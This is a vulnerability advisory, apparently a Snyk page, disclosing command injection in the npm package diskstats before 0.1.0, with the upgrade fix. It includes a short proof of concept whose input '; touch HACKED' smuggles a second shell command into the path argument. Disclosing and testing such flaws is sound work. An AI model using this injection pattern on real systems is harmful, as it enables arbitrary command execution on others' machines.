diskstats@0.0.2 vulnerabilities

Get disk stats such as space used & inode usage, relies on df

Direct Vulnerabilities

Known vulnerabilities in the diskstats package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • C
Command Injection

diskstats is a library that uses df to pull disk information such as free space & inode utilization on your system.

Affected versions of this package are vulnerable to Command Injection. The path parameter is used to build the command that is passed to the child_process.exec function without any check.

PoC by Alessio (d3lla)

  1. create a directory for testing

    mkdir poc
    cd poc/
    
  2. install diskstats module: npm i diskstats

  3. create the following PoC JavaScript file (poc.js):

    const diskstats = require('diskstats');
    diskstats.check('; touch HACKED', (err, results) => {});
    
  4. make sure that the HACKED file does not exist: ls

  5. execute the poc.js file: node poc.js

  6. the HACKED file is created: ls

How to fix Command Injection?

Upgrade diskstats to version 0.1.0 or higher.

<0.1.0